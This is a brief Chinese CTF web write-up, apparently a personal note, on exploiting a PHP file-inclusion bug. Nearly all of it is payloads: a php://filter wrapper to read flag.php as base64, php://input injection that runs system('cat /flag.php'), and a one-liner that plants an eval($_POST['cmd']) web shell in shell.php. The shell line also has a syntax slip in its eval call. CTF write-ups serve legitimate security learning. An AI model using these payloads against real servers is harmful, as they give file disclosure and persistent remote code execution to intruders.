CTF web之旅 23

------------恢复内容开始------------

构造payload

?file=php://filter/read=convert.base64-encode/resource=flag.php

php需要转化成base64显示出来 不然会被执行 

 

或者是php://input

直接传入php代码

<?php system('cat /flag.php');?>

或者传大马生成shell

<?php fputs(fopen(“shell.php”,”w”),’<?php eval($_POST["cmd"];?>’);?>